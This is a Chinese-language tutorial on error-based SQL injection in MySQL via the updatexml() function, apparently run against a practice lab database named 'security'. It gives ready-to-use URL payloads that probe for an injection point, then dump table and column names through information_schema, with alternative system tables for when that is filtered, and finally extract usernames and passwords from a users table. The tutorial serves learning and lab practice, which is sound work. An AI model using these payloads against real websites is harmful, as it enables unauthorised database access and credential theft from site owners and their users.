SQL报错注入之updatexml
目录
1.updatexml报错原理
2.判断是否有注入点
我们在地址栏中输入?id=1'
我们在地址栏中输入?id=1'--+
3.updatexml报错注入
3.1爆库名
3.2爆表名
3.3爆字段名
3.4爆数据
1.updatexml报错原理
updatexml(xml_doument,XPath_string,new_value)
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
2.判断是否有注入点
我们在地址栏中输入?id=1'
我们在地址栏中输入?id=1'--+
根据结果可以判断出存在数字型注入,并且页面会打印出报错信息,所以我们可以利用报错注入来解决
3.updatexml报错注入
3.1爆库名
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)
0x7e表示~符号,所以数据库名为security
3.2爆表名
mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .
这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替
sys.schema_auto_increment_columns
sys.schema_table_statistics_with_buffer
mysql.innodb_table_stats
mysql.innodb_table_index
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息
3.3爆字段名
我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
根据结果可以判断出字段名不全,这是因为updataxml函数只显示32位,所以我们可以用substr函数来慢慢截取来获得所有的字段名
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)
这样我们最终会得到所有的字段名
如果我们给select语句多加一个where条件会变成什么样呢?
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
此次查询直接就爆出users表的列名,可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码
3.4爆数据
?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)
通过limit函数可以爆出各个用户的密码
当然也可以通过刚刚所述的substr函数来截取密码
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)
此次updatexml报错注入就结束啦!
相关文章:
SQL报错注入之updatexml
目录 1.updatexml报错原理 2.判断是否有注入点 我们在地址栏中输入?id1 我们在地址栏中输入?id1-- 3.updatexml报错注入 3.1爆库名 3.2爆表名 3.3爆字段名 3.4爆数据 1.updatexml报错原理 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML…...
单元测试的重要性
单元测试和测试驱动开发(TDD)是软件开发中的关键实践,它们有助于提高代码的质量和可维护性。以下是对单元测试和TDD的深入分析,以及如何使用Java中的测试框架来提高代码质量的指南。 单元测试的重要性 单元测试是针对程序中最小…...
mysql线上查询数据注意锁表问题
在数据库中,锁定是用来控制多个事务并发访问相同数据时的一种机制。正确的锁定机制可以保证数据的一致性和完整性,但如果不当使用,也可能导致阻塞和死锁,特别是在高并发环境中。长时间的锁等待不仅会影响当前的事务,还…...
UE5 右键菜单缺少Generate Visual Studio project files
前言 在安装完毕 ue5 后,看到别人右键菜单有 多出来的三个选项 ,但是我却没有,如下图: 解决方式 1、在 “C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64” 路径下有 UnrealVersionSelector.exe 文件。 …...
前端性能优化-webpack构建优化
前言 本文主要总结 webpack 构建优化相关的事情 PS: webpack 的每次更新都会带来很多的新特性,因此学习新知识的时候,不要专注于流程的配置和调参。因为流程终会简化,参数(API)终会升级。要抓大放小,把精力…...
Traefik:部署与实战
一、介绍Traefik Traefik是一个开源的反向代理和负载均衡器,专为现代化的微服务架构设计。它可以与各种容器化平台(如Docker、Kubernetes)和服务发现工具(如Consul、Etcd)集成,使部署和管理服务变得更加简…...
[Spring] SpringBoot统一功能处理与图书管理系统
🌸个人主页:https://blog.csdn.net/2301_80050796?spm1000.2115.3001.5343 🏵️热门专栏: 🧊 Java基本语法(97平均质量分)https://blog.csdn.net/2301_80050796/category_12615970.html?spm1001.2014.3001.5482 🍕 Collection与…...
实现吸顶效果,一个页面多个元素吸顶效果
前言 新业务开发用到了吸顶效果而且是一个页面滚动到不同的位置不同的元素进行吸顶叠加。我是基于uniapp去写的,原理思路都一样 代码部分 下面的代码我写了两种方法都是一样的一个是通过js控制变量添加元素一个是直接通过css样式进行控制 <!-- 上半部总览位置…...
【C++入门(下)】—— 我与C++的不解之缘(二)
前言 接上篇,继续来学习C,本篇内容大概有 引用,inline 和 nullptr。 六、引用: 6.1、引用的定义 引用不是新定义一个变量,而是给已存在的变量取了一个别名,编译器不会为引用变量开辟内存空间,它…...
【数据结构】哈希应用-STL-位图
目录 1、位图的概念 2、位图的设计与实现 2.1 set 2.2 reset 2.3 test 3、C库中的位图 4、位图的优缺点 5、位图相关题目 1、位图的概念 面试题:给40亿个不重复的无符号整数,没排过序。给一个无符号整数,如何快速判断一个数是否在这4…...
Unbuntu 服务器- Anaconda安装激活 + GPU配置
一、Anaconda安装激活 1.更新 sudo apt-get update 2.安装wget、vim sudo apt-get install wget sudo apt-get install vim 3.安装Anaconda 进入这个网址:Index of /anaconda/archive/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror 点这里&#x…...
python 装饰器记录函数用时
装饰器 # 用于记录函数平均用时的装饰器 def average_time_decorator(func):times []def wrapper(*args, **kwargs):start_time time.time()result func(*args, **kwargs)end_time time.time()t end_time - start_timetimes.append(t) # 记录用时print(f"{func.__n…...
实验10 任何一个非0自然数m的立方均可写成m个连续奇数之和。
实验10 题目描述 任何一个非0自然数m的立方均可写成m个连续奇数之和。 例如: 1^3 1 2^3 35 3^3 7911 4^3 13151719 编程实现:输入一自然数n,求组成心的n个连续奇数。 【实验要求】 1、不允许用等差数列的方法求首项 2、要求使用双重循环&a…...
Jenkins的安装方式
一、Jenkins是什么 Jenkins是一款开源CI&CD软件,用于自动化构建、测试和部署软件等各种任务,以实现持续集成。 Jenkins支持各种运行方式,可通过系统包、Docker或者通过一个独立的Java程序。 二、安装方式 2.1禅道智能应用平台一键安装…...
网络之华为S5700S-52P-LI交换机系统恢复
一、需求说明 盒式交换机flash存储空间一般比较小,只有几百兆,部分比较可能不到100M。当然一般情况下也是够用的,只有在日志文件等占用较多,或者ios系统升级较多,bin文件占用较多的情况下可能出现不够用的情况。什么情…...
蜂窝网络架构
2G/3G 4G eNB RF-RRU eCPRI RRU-BBU 光纤 5G From 38.300 AMF处理信令等,UPF 用户面,后面还有SMF...
培训第二十二天(mysql数据库主从搭建)
上午 1、为mysql添加开机启动chkconfig [rootmysql1 ~]# chkconfig --list //列出系统服务在不同运行级别下的启动状态注:该输出结果只显示 SysV 服务,并不包含原生 systemd 服务。SysV 配置数据可能被原生 systemd 配置覆盖。 要列出 systemd 服务…...
速盾:CDN回源失败都有什么原因?
CDN(内容分发网络)是一种通过将内容分发到全球各个边缘节点来提高网站访问速度和用户体验的网络技术。CDN回源失败是指CDN节点无法正常获取源站(原始服务器)上的内容。下面是一些可能导致CDN回源失败的常见原因: 网络故…...
C语言 | Leetcode C语言题解之第328题奇偶链表
题目: 题解: struct ListNode* oddEvenList(struct ListNode* head) {if (head NULL) {return head;}struct ListNode* evenHead head->next;struct ListNode* odd head;struct ListNode* even evenHead;while (even ! NULL && even->…...
8月6日笔记
8月6日 红日靶场打靶继续 SHOW VARIABLES #用于显示服务器运行时的各种系统变量的当前设置。这些变量可以控制服务器的行为在 MySQL 中,general_log 和 general_log_file 是两个与“general”相关的系统变量,它们控制着服务器是否启用一般查询日志以及…...
从理论到实践:NMPC轨迹跟踪控制器的非线性优化与Simulink仿真验证
1. NMPC与MPC的核心差异:为什么非线性问题需要特殊处理? 我第一次接触NMPC(非线性模型预测控制)时,最困惑的问题是:既然MPC已经能解决大多数控制问题,为什么还要大费周章处理非线性版本…...
)
PHP网关偶发502/504?揭秘OpenResty+PHP-FPM在严苛工控环境下的8大超时耦合陷阱(附压测对比图表)
第一章:工业PHP网关的典型故障现象与诊断起点工业PHP网关作为边缘计算与传统OT系统间的关键协议转换节点,其运行稳定性直接影响产线数据采集的连续性。常见故障并非源于语法错误,而是由资源约束、时序敏感性及协议适配偏差引发的隐性异常。典…...
普通手机gps信息样本
可以看到是10位的字符串可能需要20位置才能存下来呢...
DataRoom大屏设计器:3分钟打造专业数据可视化看板的终极解决方案
DataRoom大屏设计器:3分钟打造专业数据可视化看板的终极解决方案 【免费下载链接】DataRoom 🔥基于SpringBoot、MyBatisPlus、ElementUI、G2Plot、Echarts等技术栈的大屏设计器,具备目录管理、DashBoard设计、预览能力,支持MySQL、…...
郭老师-人生最顶级的活法:三句古训,一生受用
人生最顶级的活法 ——藏在《道德经》里的三句真言“老祖宗早就把答案写好了, 只是你一直忙着刷手机,没看见。”🌿 真正的自由, 不是拥有更多, 而是—— 需要更少,看清更多,止于恰到好处。&…...
openclaw部署oauth模式codex无法正常登录
windows: openclaw onboard --auth-choice openai-codex 执行后,codex浏览器可以登录,但是终端中返回403 这里报错可以看到是region不符合,可以看下vpn中是否开启了tun模式,开启后可以测试一下地区 curl.exe https:/…...
Fish Speech-1.5企业级应用:教育课件配音、政务播报、跨境电商本地化
Fish Speech-1.5企业级应用:教育课件配音、政务播报、跨境电商本地化 1. 快速上手:用Fish Speech-1.5生成专业级语音 想象一下这样的场景:你是一名教育工作者,需要为在线课程录制配音,但自己的声音不够专业ÿ…...
OpenClaw性能优化:降低Phi-3-mini-128k-instruct调用Token消耗的7个技巧
OpenClaw性能优化:降低Phi-3-mini-128k-instruct调用Token消耗的7个技巧 1. 为什么需要关注Token消耗? 当我第一次在本地部署OpenClaw并接入Phi-3-mini-128k-instruct模型时,就被它的长文本处理能力惊艳到了。但运行一周后查看账单…...
终极指南:如何利用Awesome DevSecOps构建企业安全文化全流程
终极指南:如何利用Awesome DevSecOps构建企业安全文化全流程 【免费下载链接】awesome-devsecops An authoritative list of awesome devsecops tools with the help from community experiments and contributions. 项目地址: https://gitcode.com/gh_mirrors/aw…...
全国首个!深开鸿与前海供电公司打造的数据中心电鸿变配电室正式投运
不久前,我国首个专为数据中心设计的用户专用电力开源鸿蒙变配电室在深圳前海投入使用。该项目由深开鸿与深圳前海供电公司打造,以电鸿物联操作系统为核心,融合感知终端、电力物联、数字孪生、人工智能四大能力,为前海信息枢纽大厦…...